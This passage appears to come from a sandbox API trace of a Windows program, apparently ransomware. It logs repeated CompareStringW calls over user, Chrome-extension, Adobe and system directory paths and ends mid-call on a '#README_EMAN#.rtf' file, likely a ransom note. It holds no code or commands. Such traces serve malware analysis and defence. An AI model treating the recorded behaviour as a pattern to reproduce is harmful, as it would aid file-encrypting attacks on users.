(Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\MF\\", cchCount1=32, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Recovery\\WindowsRE\\", cchCount1=22, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\", cchCount2=133) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\", cchCount2=133) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\", cchCount2=133) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\", cchCount2=133) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\", cchCount2=133) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\", cchCount2=131) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\", cchCount2=131) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\", cchCount2=131) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\", cchCount2=131) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\", cchCount2=131) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\", cchCount2=131) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount1=130, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount1=79, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount2=97) returned 3 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount2=97) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount2=97) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount2=97) returned 3 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount2=97) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\", cchCount2=131) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\", cchCount2=131) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\", cchCount2=131) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\", cchCount2=131) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\", cchCount2=131) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\", cchCount2=131) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount1=59, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount1=59, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount2=118) returned 3 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount1=59, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount2=118) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount2=118) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount2=118) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount2=118) returned 2 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\", cchCount2=131) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\", cchCount2=131) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\", cchCount2=131) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\", cchCount2=131) returned 3 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\", cchCount2=131) returned 1 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount1=130, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\", cchCount2=87) returned 3 [0271.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount1=59, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\", cchCount2=87) returned 3 [0271.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\MF\\", cchCount1=32, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\", cchCount2=87) returned 3 [0271.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\", cchCount2=87) returned 1 [0271.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Recovery\\WindowsRE\\", cchCount1=22, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\", cchCount2=87) returned 1 [0271.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount1=79, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\", cchCount2=87) returned 1 [0271.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\", cchCount2=130) returned 1 [0271.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\", cchCount2=130) returned 3 [0271.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\", cchCount2=130) returned 1 [0271.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\", cchCount2=130) returned 3 [0271.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\", cchCount2=130) returned 3 [0271.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\", cchCount2=131) returned 1 [0271.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\", cchCount2=131) returned 1 [0271.258] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\#README_EMAN#.rtf" (normalized: "c:\\program files 